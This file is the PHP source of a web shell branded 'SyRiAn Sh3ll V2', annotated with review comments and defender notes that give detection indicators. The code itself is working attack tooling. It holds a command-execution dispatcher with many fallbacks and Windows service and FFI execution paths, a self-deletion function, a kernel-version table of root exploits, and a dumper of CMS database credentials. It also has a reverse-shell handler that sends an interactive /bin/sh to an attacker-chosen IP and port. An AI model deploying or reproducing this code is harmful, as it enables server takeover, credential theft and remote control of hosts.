function str_hex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; }

# SafeMode(): returns '0ff' when the safe_mode ini value is empty, else '0N'.
function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = '0ff'; } else { $safe_mode = '0N'; } return $safe_mode; }

# currentFileName(): last '/'-separated component of $_SERVER["SCRIPT_NAME"].
function currentFileName() { $currentFileName = $_SERVER["SCRIPT_NAME"]; $currentFileName = Explode('/', $currentFileName); $currentFileName = $currentFileName[count($currentFileName) - 1]; return $currentFileName; }

# Suicide(): unlink() on the name returned by currentFileName(), i.e. a
# relative path.
# Defender note: the script can remove itself, so a missing file does not clear
# a host; web access logs and file-system timelines remain the evidence.
function Suicide() { unlink(currentFileName()); }

# rootxpL(): searches php_uname() output for each array key in order and
# returns the string mapped to the first key found. The keys look like Linux
# kernel version prefixes and the values appear to be names of publicly known
# local privilege-escalation exploits. $xpl is never assigned before the final
# test, so the fallback is always 'Not found.'. One value contains a line break
# in this copy.
# Defender note: the visible code only returns the text for display; the table
# itself is a stable string signature for this family of scripts.
function rootxpL() { $v=@php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, 
ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $k=>$x)if(strstr($v,$k))return $x; if(!$xpl)$xpl='Not found.'; return $xpl; }

# The next nine functions each report, as a display label, whether one
# function exists or one ini value is set. The label spelling differs from
# function to function ("On"/"Off", "0N"/"0ff", "ON", " ON ").
# PostgreSQL(): tests pg_connect.
function PostgreSQL() { if(@function_exists('pg_connect')) { $postgreSQL = "On"; } else { $postgreSQL = "Off"; } return $postgreSQL; }
# Oracle(): tests ocilogon.
function Oracle() { if(@function_exists('ocilogon')) { $oracle = "On"; } else { $oracle = "Off"; } return $oracle; }
# MsSQL(): tests mssql_connect.
function MsSQL() { if(@function_exists('mssql_connect')) { $msSQL = "On"; } else { $msSQL = "Off"; } return $msSQL; }
# MySQL2(): tests mysql_connect.
function MySQL2() { $mysql_try = function_exists('mysql_connect'); if($mysql_try) { $mysql = "0N"; } else { $mysql = "0ff"; } return $mysql; }
# Gzip(): tests gzencode.
function Gzip() { if (function_exists('gzencode')) { $gzip = "ON"; } else { $gzip = "Off"; } return $gzip; }
# MysqlI(): tests mysqli_connect.
function MysqlI() { if (function_exists('mysqli_connect')) { $mysqli = "ON"; } else { $mysqli = "Off"; } return $mysqli; }
# MSQL(): tests msql_connect.
function MSQL() { if (function_exists('msql_connect')) { $mSql = " ON "; } else { $mSql = "Off"; } return $mSql; }
# SQlLite(): tests sqlite_open.
function SQlLite() { if (function_exists('sqlite_open')) { $SQlLite = "ON"; } else { $SQlLite = "Off"; } return $SQlLite; }
# RegisterGlobals(): reads the register_globals ini value.
function RegisterGlobals() { if(ini_get('register_globals')) { $registerg="On"; } else { $registerg="Off"; } return $registerg; } 
# HardSize($size): formats a byte count as GB, MB or KB (powers of 1024,
# rounded to two decimals), or as "<n> B" below 1024.
function HardSize($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; }

# Curl(): "On"/"Off" label for extension_loaded('curl').
function Curl() { if(extension_loaded('curl')) { $curl = "On"; } else { $curl = "Off"; } return $curl; }

# DecryptConfig(): includes "DecryptConfig.php" from the include path (errors
# suppressed), then copies the variables and constants that file defined into
# host / database / user / password / prefix fields according to
# $_POST['ScriptType'] ('vb', 'wp', 'jos', 'phpbb', 'ipb', 'smf', 'mybb';
# presumably one code per CMS or forum product), and echoes them. Fields a
# branch does not set are echoed undefined. The 'mybb' branch assigns $prefix
# twice.
# Defender note: the output is a plaintext dump of database credentials. If
# this script is found, rotate the credentials of every application it could
# read.
function DecryptConfig() { @include("DecryptConfig.php"); if($_POST['ScriptType'] == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $modecp = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == 'jos') { $dbName = $db; $prefix = $dbprefix; $email = $mailfrom; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == 'phpbb') { $host = $dbhost; $port = $dbport; $dbName = $dbname; $user = $dbuser; $pass = $dbpasswd; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == 'smf') { $dbName = $db_name; $pass = $db_passwd; $prefix = $db_prefix; $host = $db_server; $user = $db_user; $email = $webmaster_email; } elseif($_POST['ScriptType'] == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; 
$prefix = $config['database']['table_prefix']; } echo ' #-------------------------------# # Config Informations # #-------------------------------# Host : '.$host.' DB Name : '.$dbName.' DB User : '.$user.' DB Pass : '.$pass.' Prefix : '.$prefix.' Email : '.$email.' Port : '.$port.' ACP : '.$admincp.' MCP : '.$modecp.' '; }

# footer(): echoes the fixed page footer (a "[TOP]" label and a credit line).
function footer() { echo '
[TOP]
C0D3D By  ~~ [ EH SyRiAn_34G13 ] ~~ [ sy34@msn.com ] ~~ [ www.syrian-shell.com ]
'; }

# whereistmP(): returns the first directory that exists and is writable, tried
# in this order: /tmp, /usr/tmp, /var/tmp, %USERPROFILE%, %ALLUSERSPROFILE%,
# session.save_path, upload_tmp_dir, %TMP% (else %TEMP%); falls back to '.'.
function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; }

# The *shelL helpers below are Windows command-execution paths. winshelL(),
# srvshelL() and ffishelL() redirect the command's output to a file named
# uniqid('NJ') inside the whereistmP() directory, read it back, and delete it.
# Defender note: short-lived files and Windows services whose names begin with
# "NJ", and cmd.exe started from the web server's process tree, are the
# artefacts these helpers leave.

# winshelL($command): runs "cmd.exe /C <command>" through win_shell_execute(),
# sleeps one second, then returns the captured output.
function winshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; }

# update(): echoes a fixed message; nothing else happens in the visible code.
function update() { echo "[+] Update Has D0n3 ^_^"; }

# srvshelL($command): creates a Windows service with a uniqid('NJ') name whose
# path is $_SERVER['ComSpec'] (default d:\windows\system32\cmd.exe) and whose
# parameters run the command; starts, stops and deletes the service, then
# polls once a second until the output file exists.
function srvshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; }

# ffishelL($command): binds kernel32.dll WinExec through the ffi extension and
# uses it to run "cmd.exe /c <command>"; polls for the output file as above.
function ffishelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; }

# comshelL($command,$ws): calls exec() on the caller-supplied object $ws
# (presumably a COM scripting-shell object; not constructed in this view) and
# returns everything read from its StdOut. Exe() below does not call it.
function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); }

# perlshelL($command): evaluates system("<command>") through the perl
# extension and returns the buffered output.
function perlshelL($command) { $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_contents(); ob_end_clean(); return $exec; }

# Exe($command): command-execution dispatcher. Uses the first available of
# passthru, system, exec, shell_exec, popen, proc_open, then winshelL(),
# srvshelL(), ffishelL() (only when the global $windows is set) and
# perlshelL(), and returns $exec.
# Defender note: because the fallback list is long, disabling one or two PHP
# functions does not stop it; the full set needs to be covered, and shell
# processes spawned by the web server should raise an alert.
function Exe($command) { global 
$windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(function_exists('win_shell_execute'))$exec=winshelL($command); elseif(function_exists('win32_create_service'))$exec=srvshelL($command); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; }

# magicQouts(): "0ff"/"0N" label for get_magic_quotes_gpc().
function magicQouts() { $mag=get_magic_quotes_gpc(); if (empty($mag)) { $mag = "0ff"; } else { $mag="0N"; } return $mag; }

# DisableFunctions(): the disable_functions ini value, or "NONE" when empty.
function DisableFunctions() { $disfun = ini_get('disable_functions'); if (empty($disfun)) { $disfun = "NONE"; } return $disfun; }

# Top-level: host description, printed later in the header.
$uname= @php_uname();

# SelectCommand($os): echoes one of two literals depending on whether $os is
# 'Windows'. Both literals are a single space in this copy.
function SelectCommand($os) { if($os == 'Windows') { echo " "; } else { echo " "; } }

# GenerateFile($name,$content): writes $content to $name opened with "w+"
# (created or truncated). All errors are suppressed and the return value is
# always true, so the caller cannot tell whether the write happened.
function GenerateFile($name,$content) { $file = @fopen($name,"w+"); @fwrite($file,$content); @fclose($file); return true; }

# Logout(): prints an empty literal in this copy.
function Logout() { print""; }

# Top-level request handling starts here. ?id=logout calls Logout().
if($_GET['id']== 'logout') { Logout(); }
# NOTE(review): from here on, each "# ---" banner of this collapsed copy shares
# its physical line with the statements that follow it; that layout is kept as
# found.
# After the CSS banner: the page title is echoed, plus an empty literal when
# ?id is empty.
# After the Authentication banner: when $uselogin is 1, the `user` and `pass`
# cookies are compared (loose !=) with $user and md5($pass); on mismatch the
# POST fields usrname/passwrd are compared with $user/$pass, and if they do not
# match the login form is echoed and the script exits. $uselogin, $user and
# $pass are defined outside this view.
# Defender note: the cookie names `user`/`pass` and the POST field names
# `usrname`/`passwrd` are usable indicators in captured HTTP traffic.
# ---------------------------------------# # CSS # #----------------------------------------# echo " SyRiAn Sh3ll ~ V2~ [ B3 Cr34T!V3 Or D!3 TRy!nG ] "; if($_GET['id'] == '') { echo ""; } # ---------------------------------------# # Authentication # #----------------------------------------# if ($uselogin ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != 
md5($pass)) { if($_POST[usrname]==$user and $_POST[passwrd]==$pass) { print''; } else { if($_POST[usrname]) { print''; } echo '

SyRiAn Sh3ll
UserName :

Password :

'; exit; } } }
# After the Operating System / Server Dir banners: $os is set to "Windows" when
# the second character of getcwd() is ':', otherwise "Linux"; when getcwd() is
# empty the OS environment variable or php_uname() is matched with eregi().
# $pwd comes from Exe("pwd") or Exe("cd"), with getcwd() as fallback.
# After the Header banner: one echo prints an environment summary (PHP
# settings, database extensions, disk space, versions, disabled functions,
# client and server addresses, $uname, $dir) and the output of Exe('id').
# $server is read from $SERVER_SOFTWARE, which is not assigned in this view.
# ---------------------------------------# # Operating System # #----------------------------------------# $os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; # ---------------------------------------# # Server Dir # #----------------------------------------# if(empty($dir)) { $opsy = getenv('OS'); if(empty($opsy)) { $opsy = php_uname(); } if(empty($opsy)) { $opsy ="-"; $os = "Linux"; } else { if(eregi("^Windows",$opsy)) { $os = "Windows"; } else { $os = "Linux"; } } } if($os == "Linux") { $pwd = @Exe("pwd"); } elseif($os == "Windows") { $pwd = @Exe("cd");} if(empty($pwd)) { $pwd = getcwd(); } # ---------------------------------------# # Header # #----------------------------------------# $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); $server = @substr($SERVER_SOFTWARE,0,120); echo "

  

 
SyRiAn Sh3ll
V2

  [Main] [Scripts Hacking] [Spamming] [Bypass] [About] [Logout] [SuiCide]

  Safe Mode = ".@SafeMode()."   System = ".$os."   Magic_Quotes = ". @magicQouts()."   Curl = ".@Curl()."   Register Globals = ".@RegisterGlobals()."   Open Basedir = ".@openBaseDir()."
  Gzip = ".@Gzip()."   MySQLI = ".@MysqlI()."   MSQL = ".@MSQL()."   SQL Lite = ".@SQlLite()."   Usefull Locals = ".rootxpL()."
  Free Space = ".@HardSize(disk_free_space('/'))."   Total Space = ".@HardSize(disk_total_space("/"))."   PHP Version = ".@phpversion()."   Zend Version = ".@zend_version()."   MySQL Version = ".@mysql_get_server_info()."
  MySQL = ".MySQL2()."   MsSQL = ".MsSQL()."   PostgreSQL = ".PostgreSQL()."   Oracle = ".Oracle()."   Server Name = ".$_SERVER['HTTP_HOST']."   Server Admin = ".$_SERVER['SERVER_ADMIN']."
  Dis_Functions = ". DisableFunctions()."
  Your IP = ". GetRealIP()."   Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Bing Search] [Reverse IP]   Date Time = ".date('Y-m-d H:i:s')."

  Server :  
uname -a :  
pwd :  
ID :  

  ".$server."
  ".$uname." [Google]
  ".$dir."
  ".Exe('id')."

  [Down] [Print]

";
# After the SuiCide banner: ?id=100 echoes an empty literal in this copy and
# ?id=Delete calls Suicide(). After the Main Page banner: ?id=mainPage opens
# the branch that renders the menu below; its closing brace is not within this
# view.
# Defender note: the query values id=mainPage, id=logout, id=Delete and id=100
# can be searched for in web access logs.
# ---------------------------------------# # SuiCide # #----------------------------------------# if($_GET['id'] == 100) { echo ""; } if($_GET['id'] == 'Delete') { Suicide(); } # ---------------------------------------# # Main Page # #----------------------------------------# if ($_GET['id']== 'mainPage' ) { echo "
"; if($_POST['editFileSubmit']) { echo " "; echo ""; } echo "
  Commands Alias
";SelectCommand($os); echo "
  Command Line
  Change Directory
  Edit File
  Get File
  Server ShortCut
  CGI Perl
  Change Mode

  Back Connection

";
# Back-connection handler, run when the POST field backConnectionSubmit is set.
# It reads yourip/yourport from POST, detaches with pcntl_fork() and
# posix_setsid() when pcntl_fork exists, opens a TCP connection to that address
# (30 s timeout), starts $shell through proc_open() and relays data between the
# socket and the process pipes in reads of up to $chunk_size bytes until the
# socket or the process stdout reaches EOF. printit() is declared at the end of
# this branch, inside the `if`.
# Defender note: what this produces on a host is an outbound TCP connection
# from a web-server worker together with an interactive /bin/sh child process.
# Egress filtering on the web tier and process-lineage alerting address both.
if($_POST['backConnectionSubmit']) { $ip = $_POST['yourip']; $port = $_POST['yourport']; @set_time_limit (0); $VERSION = "1.0"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("[-] ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("[-] Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("[-] WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("[-] Error Can't Connect !! "); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("[+] Connected Successfully With $ip:$port"); printit("[+] SyRiAn Sh3ll V2"); while (1) { if (feof($sock)) { printit("[-] ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("[-] ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); 
fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } }
# The remaining menu labels are echoed next; the string literal opened here is
# not closed within this view.
echo "
  Hash Analyzer
  Eval Code
  Users & Domains
  Reading Files
  Encryption
  Metasploit Connection
  Show Users
  Ports Scanner
  ACP Finder
  DDOS Attacker
  Config Finder